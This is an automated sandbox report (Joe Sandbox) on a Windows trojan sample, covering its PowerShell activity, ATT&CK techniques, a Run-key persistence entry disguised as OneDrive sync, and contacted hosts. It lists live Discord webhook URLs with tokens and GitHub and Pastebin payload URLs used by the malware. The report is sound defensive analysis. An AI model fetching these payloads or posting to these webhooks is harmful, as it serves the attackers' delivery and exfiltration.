Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exeCode function: 0_2_00678D0A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00678D0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		141
Virtualization/Sandbox Evasion		LSASS Memory161
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell		Logon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS141
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync35
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534109 Sample: Lm9IJ4r9oO.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 59 pastebin.com 2->59 61 raw.githubusercontent.com 2->61 63 2 other IPs or domains 2->63 81 Suricata IDS alerts for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus / Scanner detection for submitted sample 2->85 89 7 other signatures 2->89 10 Lm9IJ4r9oO.exe 12 2->10         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 2->15         started        signatures3 87 Connects to a pastebin service (likely for C&C) 59->87 process4 signatures5 91 Suspicious powershell command line found 10->91 17 powershell.exe 12 10->17         started        20 WerFault.exe 19 16 10->20         started        23 powershell.exe 7 13->23         started        25 conhost.exe 1 13->25         started        27 powershell.exe 15->27         started        29 conhost.exe 15->29         started        process6 file7 73 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->73 31 powershell.exe 16 27 17->31         started        36 conhost.exe 17->36         started        55 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->55 dropped 75 Suspicious powershell command line found 23->75 77 Powershell creates an autostart link 23->77 38 powershell.exe 14 7 23->38         started        40 powershell.exe 27->40         started        signatures8 process9 dnsIp10 65 raw.githubusercontent.com 185.199.111.133, 443, 49710, 49711 FASTLYUS Netherlands 31->65 67 discord.com 162.159.138.232, 443, 62862, 62871 CLOUDFLARENETUS United States 31->67 51 C:\Users\user\AppData\...\ztufso2n.cmdline, Unicode 31->51 dropped 53 C:\ProgramData\...\BeginSync.lnk, MS 31->53 dropped 79 Tries to open files direct via NTFS file id 31->79 42 csc.exe 3 31->42         started        45 conhost.exe 31->45         started        47 attrib.exe 1 31->47         started        69 pastebin.com 104.20.3.235, 443, 62863, 62864 CLOUDFLARENETUS United States 38->69 71 185.199.110.133, 443, 62865, 62866 FASTLYUS Netherlands 38->71 file11 signatures12 process13 file14 57 C:\Users\user\AppData\Local\...\ztufso2n.dll, PE32 42->57 dropped 49 cvtres.exe 1 42->49         started        process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Lm9IJ4r9oO.exe42%ReversingLabsWin32.Trojan.Generic
Lm9IJ4r9oO.exe100%AviraHEUR/AGEN.1317649
Lm9IJ4r9oO.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.111.133
    		truetrue
      		unknown
      pastebin.com
      		104.20.3.235
      		truetrue
        		unknown
        198.187.3.20.in-addr.arpa
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996true
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txttrue
              		unknown
              https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtfalse
                		unknown
                http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                  		unknown
                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                    		unknown
                    http://pastebin.com/raw/sA04Mwk2false
                      		unknown
                      https://pastebin.com/raw/sA04Mwk2false
                        		unknown
                        https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt99uLm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.microsoft.coEpowershell.exe, 00000018.00000002.2227532640.000001D0F64B0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://discord.compowershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtgLm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000012.00000002.2072699759.00000204E4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE7D5000.00000004.00000800.00020000.00000000.sdmptrue
                                      		unknown
                                      https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txt05Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://go.micropowershell.exe, 00000004.00000002.1812665851.0000000004BE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmptrue
                                          • URL Reputation: safe
                                          		unknown
                                          https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txtPpowershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://upx.sf.netAmcache.hve.11.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://discord.com/powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://discord.compowershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://aka.ms/pscore6powershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt-usebasipowershell.exe, 00000004.00000002.1812613044.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1820569925.000000000740C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811200357.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812227809.0000000002A40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtpowershellLm9IJ4r9oO.exefalse
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://raw.githubusercontent.com/labail300/psapi/main/modmenu.txtnLm9IJ4r9oO.exe, 00000000.00000003.1418176354.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000003.1418283397.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Lm9IJ4r9oO.exe, 00000000.00000002.1483561322.0000000001344000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://raw.githubusercontent.com/Lm9IJ4r9oO.exe, 00000000.00000002.1483428569.0000000001311000.00000004.00000020.00020000.00000000.sdmptrue
                                                          		unknown
                                                          https://discord.com/api/webhooks/128545359042878powershell.exe, 00000012.00000002.2072699759.00000204E5302000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DF153000.00000004.00000800.00020000.00000000.sdmptrue
                                                            		unknown
                                                            https://0.discorpowershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://raw.githubusercontent.compowershell.exe, 00000004.00000002.1812665851.0000000004547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmptrue
                                                                		unknown
                                                                https://contoso.com/powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1818087157.0000000005463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2104984117.00000204F4551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2220062700.000001D0EE391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://raw.githubusercontent.compowershell.exe, 00000012.00000002.2072699759.00000204E492E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E48FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE739000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTpowershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://aka.ms/pscore68powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dllpowershell.exe, 00000004.00000002.1812665851.0000000004639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1812665851.0000000004645000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1812665851.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E44D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://0.discord.com/powershell.exe, 00000012.00000002.2072699759.00000204E5443000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://pastebin.compowershell.exe, 00000012.00000002.2072699759.00000204E5E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E4873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E62C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2072699759.00000204E46FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE6AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DFCE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0E0107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE53B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://pastebin.compowershell.exe, 00000012.00000002.2072699759.00000204E485A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2138446158.000001D0DE69E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            104.20.3.235
                                                                            		pastebin.comUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            162.159.138.232
                                                                            		discord.comUnited States
                                                                            		13335CLOUDFLARENETUStrue
                                                                            185.199.110.133
                                                                            		unknownNetherlands
                                                                            		54113FASTLYUSfalse
                                                                            185.199.111.133
                                                                            		raw.githubusercontent.comNetherlands
                                                                            		54113FASTLYUStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1534109
                                                                            Start date and time:2024-10-15 15:53:10 +02:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 53s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:26
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Lm9IJ4r9oO.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.expl.evad.winEXE@26/26@5/4
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 76%
                                                                            • Number of executed functions: 396
                                                                            • Number of non-executed functions: 55
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, watson.events.data.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollectorcommon.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Lm9IJ4r9oO.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            09:54:08API Interceptor300x Sleep call for process: powershell.exe modified
                                                                            09:54:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                            15:54:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                            15:54:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            104.20.3.235BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                            • pastebin.com/raw/sA04Mwk2
                                                                            sostener.vbsGet hashmaliciousNjratBrowse
                                                                            • pastebin.com/raw/V9y5Q5vv
                                                                            SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                            • pastebin.com/raw/V9y5Q5vv
                                                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                                                            • pastebin.com/raw/V9y5Q5vv
                                                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                            • pastebin.com/raw/NsQ5qTHr
                                                                            Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                                            • pastebin.com/raw/NsQ5qTHr
                                                                            2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                                                            • pastebin.com/raw/NsQ5qTHr
                                                                            PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                            • pastebin.com/raw/NsQ5qTHr
                                                                            162.159.138.232cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                                      SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                                        Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                          SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                            http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                                              https://hkdiscord.antsoon.com/Get hashmaliciousUnknownBrowse
                                                                                                185.199.110.133cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                raw.githubusercontent.comcr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 185.199.111.133
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.109.133
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.111.133
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.110.133
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 185.199.109.133
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 185.199.108.133
                                                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                • 185.199.109.133
                                                                                                na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                • 185.199.108.133
                                                                                                oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                • 185.199.108.133
                                                                                                discord.comcr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 162.159.138.232
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.137.232
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.137.232
                                                                                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.135.232
                                                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 162.159.138.232
                                                                                                Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.135.232
                                                                                                Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                • 162.159.136.232
                                                                                                0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                • 162.159.137.232
                                                                                                pastebin.comgaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 172.67.19.24
                                                                                                cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • 172.67.19.24
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.20.4.235
                                                                                                BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
